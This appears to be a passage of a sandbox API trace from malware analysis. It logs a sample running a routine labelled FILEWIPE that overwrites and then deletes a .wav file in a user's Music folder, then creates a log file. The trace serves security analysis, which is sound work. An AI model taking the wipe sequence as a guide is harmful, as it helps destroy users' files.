| out: hHeap=0x8a0000) returned 1 [0187.350] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.350] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.350] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.350] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.350] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.351] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.351] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.351] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.351] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0187.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.351] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.351] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0187.351] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.352] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.352] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0187.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0187.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0187.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.352] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.353] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.355] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.355] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0187.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0187.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.355] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.355] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.355] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0xef68d520, ftLastWriteTime.dwHighDateTime=0x1d5dea6, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 0x90ae18 [0187.356] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0187.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.356] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.356] CharLowerBuffW (in: lpsz="byte[9269]", cchLength=0xa | out: lpsz="byte[9269]") returned 0xa [0187.356] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.356] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.356] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.356] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.356] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.357] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.357] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0187.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.358] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.358] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.358] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.358] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0187.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.359] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0187.359] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\x4yfdz60f6cktl.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0187.360] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.360] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.360] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0187.360] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.360] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.360] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.361] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.361] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.361] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.361] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.361] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.361] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0187.361] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.361] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.361] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.361] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.361] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.361] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.361] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.361] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", lpFilePart=0x0) returned 0x5b [0187.362] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0x14e615c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 0x90ae18 [0187.362] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\x4yfdz60f6cktl.wav")) returned 1 [0187.363] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cf0c5e0, ftCreationTime.dwHighDateTime=0x1d5e693, ftLastAccessTime.dwLowDateTime=0xef68d520, ftLastAccessTime.dwHighDateTime=0x1d5dea6, ftLastWriteTime.dwLowDateTime=0x14e615c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2435, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="X4YFdz60f6cKTl.wav", cAlternateFileName="X4YFDZ~1.WAV")) returned 0 [0187.363] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.364] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.375] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.375] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.376] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.376] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.376] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.376] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.376] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0187.376] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0187.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.377] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0187.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0187.377] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0187.378] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 